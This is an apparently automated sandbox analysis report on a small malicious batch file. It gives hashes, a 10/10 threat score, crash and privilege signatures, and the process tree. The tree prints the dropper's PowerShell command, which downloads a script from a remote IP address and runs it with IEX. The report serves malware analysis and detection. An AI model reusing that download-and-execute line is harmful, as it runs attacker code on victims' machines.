Analysis
- max time kernel: 131s
- max time network: 67s
- platform: windows10_x64
- resource: win10v200430
- submitted: 16-05-2020 02:10
Static task: static1

Behavioral task: behavioral1
- Sample: ce9dc8d828e18ce089cc6d84d08fe452.bat
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: ce9dc8d828e18ce089cc6d84d08fe452.bat
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: ce9dc8d828e18ce089cc6d84d08fe452.bat
- Size: 219B
- MD5: 2d905313dbc56c967f83d1426a7df00c
- SHA1: 44f27a3aa997e1cb05864f2bfd2ec0da5f1ea539
- SHA256: 7442acba79bb7e085e7198a9bdc242d324676559fb316ab487018457b4e0260c
- SHA512: 05e139eea56972f817f4583326ec6a448e3f93c74268ba6ea310f4dd879716340843ff33dc9b970895c02fb72ee0db7c28accb07eb64a1b847d3fdddfe14b32b
- Score: 10/10
Malware Config (extracted)
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/ce9dc8d828e18ce089cc6d84d08fe452
Signatures

- Program crash (1 IoC)
  Processes: WerFault.exe
    pid    pid_target    process         target process
    2440   1928          WerFault.exe    powershell.exe

- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: WerFault.exe
    description                 pid     process
    Token: SeRestorePrivilege   2440    WerFault.exe
    Token: SeBackupPrivilege    2440    WerFault.exe
    Token: SeDebugPrivilege     2440    WerFault.exe

- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes: WerFault.exe
    pid     process
    2440    WerFault.exe   (the same row is recorded 14 times)
Processes (process tree; each level is a child of the one above)

1. C:\Windows\system32\cmd.exe (PID: 1732)
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ce9dc8d828e18ce089cc6d84d08fe452.bat"

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 1928)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ce9dc8d828e18ce089cc6d84d08fe452');Invoke-PRBSJMAYEWZY;Start-Sleep -s 10000"

      3. C:\Windows\SysWOW64\WerFault.exe (PID: 2440)
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 704
         Signatures:
         - Program crash
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious behavior: EnumeratesProcesses